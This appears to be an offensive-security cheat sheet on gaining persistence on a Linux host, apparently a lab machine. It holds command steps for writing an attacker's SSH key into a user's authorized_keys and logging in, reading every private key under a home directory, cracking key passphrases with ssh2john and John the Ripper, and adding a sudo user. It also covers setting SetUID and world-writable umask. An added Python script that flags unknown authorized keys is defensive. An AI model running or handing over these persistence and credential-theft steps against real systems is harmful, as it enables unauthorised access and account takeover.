
Persistence

SSH Key Injection
Generate SSH Keys
ssh-keygen -t ed25519 -f key
So that ssh accepts the private key, give it restricted permissions:
chmod 600 key
  • If the authorized_keys file doesn't exist, create one with your public key:

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c" > /home/dvir/.ssh/authorized_keys
  • Otherwise, append your public key:

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c" >> /home/dvir/.ssh/authorized_keys
Now just connect with your private key:
ssh -i key dvir@10.10.11.8
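
A defender's check for the change described above, as an added example that is not part of the original page: it fingerprints every entry in authorized_keys content and reports keys that are not on an allowlist. The function names, the allowlist and the sample file content are constructed for illustration; the second sample entry reuses the key string shown above.

```python
import base64, hashlib, struct

def blob_type(b64_blob):
    """Key type name embedded at the start of an SSH public-key blob."""
    raw = base64.b64decode(b64_blob, validate=True)
    (n,) = struct.unpack(">I", raw[:4])
    return raw[4:4 + n].decode("ascii", "replace")

def fingerprint(b64_blob):
    """OpenSSH-style SHA256 fingerprint (unpadded base64 of the blob's digest)."""
    digest = hashlib.sha256(base64.b64decode(b64_blob, validate=True)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def parse_key(fields):
    """Locate (keytype, blob, comment); fields before the key type are options."""
    for i in range(len(fields) - 1):
        try:
            if blob_type(fields[i + 1]) == fields[i]:
                return fields[i], fields[i + 1], " ".join(fields[i + 2:])
        except (ValueError, struct.error):
            continue
    return None

def audit(text, allowed):
    """Return (line number, finding, detail) for entries not in the allowlist."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        parsed = parse_key(fields)
        if parsed is None:
            findings.append((lineno, "unparseable", line.strip()[:40]))
        elif fingerprint(parsed[1]) not in allowed:
            findings.append((lineno, "unknown-key", f"{parsed[0]} {fingerprint(parsed[1])} {parsed[2]}"))
    return findings

def sample_blob(seed):  # constructed ed25519-shaped blob for the demo, not a real key
    raw = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + bytes([seed]) * 32
    return base64.b64encode(raw).decode()

APPROVED = sample_blob(1)  # constructed "known good" key
PAGE_KEY = "AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi"  # key string from the page
SAMPLE = ("# constructed authorized_keys content\n"
          f'from="10.0.0.0/8",no-pty ssh-ed25519 {APPROVED} deploy@build\n'
          f"ssh-ed25519 {PAGE_KEY} b0llull0s@p4n1c\n")

if __name__ == "__main__":
    print(audit(SAMPLE, {fingerprint(APPROVED)}))
```

Run on a schedule against each user's authorized_keys, with the allowlist kept outside the hosts being audited, a new finding marks a key that was added out of band.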

Using Existing keys

Look for the private key
find /home/user -name "id_*" -exec cat {} \;
  • Once you find it, copy the key into your .ssh directory and ssh in.

  • You can also check whether the corresponding private/public key is known by using this repo.

Crack the passphrase

  • Use ssh2john to generate a hash from the key:

ssh2john private_key > private_key.hash
  • Then feed this hash into John the Ripper:

john private_key.hash --wordlist=/path/to/wordlist

Clone the key

  • Sometimes you may need to write a decrypted copy of an encrypted key:

openssl rsa -in spanishdancer.key -out ~/keys/ariekei-spanishdancer
Account Manipulation
Edit sudoers file
sudo visudo
Create a new user
sudo useradd newuser
Add user to the sudo group
sudo usermod -aG sudo newuser
Set or change password
sudo passwd newuser

Access Control Lists

Show the ACL
getfacl file.txt
Grant read/write permissions to 'user' on file.txt
setfacl -m u:user:rw file.txt
File Manipulation
Set the SetUID bit
chmod u+s <file>
Octal Numbers (4 = Read, 2 = Write, 1 = Execute)
sudo chmod 755 file.txt
Change file owner and group
sudo chown user:group file.txt
umask Manipulation
  • umask + scheduled jobs or scripts

  • umask + service/unit files

  • umask + container images / shared volumes

  • umask + temp-file creation

  • umask + dropping SSH keys/configs

  • umask + web-app / CGI / uploaded files

World read/write/execute
umask 000
Group-writable
umask 002
World-readable
umask 022
